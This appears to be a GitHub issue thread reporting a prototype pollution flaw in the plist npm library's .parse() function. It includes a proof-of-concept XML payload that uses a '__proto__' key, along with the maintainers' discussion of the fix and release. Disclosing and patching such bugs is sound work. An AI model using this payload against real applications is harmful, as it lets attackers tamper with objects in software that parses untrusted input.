Prototype Pollution using .parse() #114

Closed
keerok opened this issue Jan 6, 2022 · 4 comments

Comments

@keerok keerok commented Jan 6, 2022

Hi, there's a prototype pollution in .parse() related to the XML that is being parsed by it. In the following example the prototype pollution will affect the length parameter.

```js
var plist = require('plist');

var xml = `
<plist version="1.0">
    <key>metadata</key>
    <dict>
      <key>bundle-identifier</key>
      <string>com.company.app</string>
    </dict>
  </plist>`;

console.log(plist.parse(xml));
/**
 * * * * * * * * * * * * * * * * * * * * * * * * * *
 * * * * END OF THE NORMAL CODE EXAMPLE! * * * * * *
 * * * * * * * * * * * * * * * * * * * * * * * * * *
 **/


/**
 * * * * * * * * * * * *
 * PROTOTYPE POLLUTION *
 * * * * * * * * * * * *
 **/
var xmlPollution = `
<plist version="1.0">
  <dict>
    <key>__proto__</key>
    <dict>
      <key>length</key>
      <string>polluted</string>
    </dict>
  </dict>
</plist>`;
console.log(plist.parse(xmlPollution).length); // polluted
```
@mario-canva mario-canva (Contributor) commented Mar 14, 2022

The GitHub advisory states this vulnerability has been fixed in 3.0.4, but I can still reproduce it in 3.0.4 as well.

Version 3.0.4 was released back in August 2021 and the vulnerability was reported in January 2022. The 3.0.4 version only inlines an external dependency, so it does little in terms of security.

The vulnerable code seems to be in the parsePlistXML function:

```js
new_obj[key] = parsePlistXML(node.childNodes[i]);
```

@TooTallNate will try to submit a PR to fix this vulnerability in the next few days, unless you want to fix yourself.
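The assignment quoted in the comment above reduces to the pattern below. This is an added example, not the plist project's code or its eventual fix: it uses constructed in-memory dict entries in place of parsed XML, and the names `buildDictVulnerable`, `buildDictHardened` and `hasForeignPrototype` are assumptions. It also shows the caveat that the payload replaces the returned object's prototype rather than modifying the global `Object.prototype`.

```javascript
// Constructed stand-in for the <dict> entries the reporter's xmlPollution
// payload would produce: one key "__proto__" whose value is the inner dict.
const POLLUTED_ENTRIES = [['__proto__', { length: 'polluted' }]];
const BENIGN_ENTRIES = [['bundle-identifier', 'com.company.app']];

// Vulnerable pattern, mirroring `new_obj[key] = ...`: on a plain object the
// bracket assignment with key "__proto__" hits the inherited __proto__ setter,
// so the attacker-supplied dict becomes the returned object's prototype.
function buildDictVulnerable(entries) {
  const newObj = {};
  for (const [key, value] of entries) {
    newObj[key] = value;
  }
  return newObj;
}

// Hardened pattern (an added illustration, not necessarily the project's fix):
// refuse the one key that can reach a setter on a plain object, and define
// every other entry as an own data property so no accessor is ever invoked.
function buildDictHardened(entries) {
  const newObj = {};
  for (const [key, value] of entries) {
    if (key === '__proto__') {
      throw new Error('plist dict key "__proto__" is not allowed');
    }
    Object.defineProperty(newObj, key, {
      value, writable: true, enumerable: true, configurable: true,
    });
  }
  return newObj;
}

// Consumer-side check on untrusted parse output: a freshly built dict should
// inherit from Object.prototype and nothing else. The attack swaps this
// object's prototype; Object.prototype itself is left untouched.
function hasForeignPrototype(obj) {
  return Object.getPrototypeOf(obj) !== Object.prototype;
}

// Stand-alone demonstration.
const demo = buildDictVulnerable(POLLUTED_ENTRIES);
console.log(demo.length, hasForeignPrototype(demo)); // polluted true
console.log('length' in Object.prototype); // false: global prototype intact
```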

@mario-canva mario-canva (Contributor) commented Mar 21, 2022

Thanks for merging my PR @mreinstein. Would you please release a new version of plist with this fix, so people can patch against this prototype pollution vulnerability?

@mreinstein mreinstein (Collaborator) commented Mar 23, 2022

Published as 3.0.5 on npm. Thanks for the PR!

@Donhv Donhv commented Jun 29, 2022

This issue still happens on version 3.0.5 with Nexus scan.
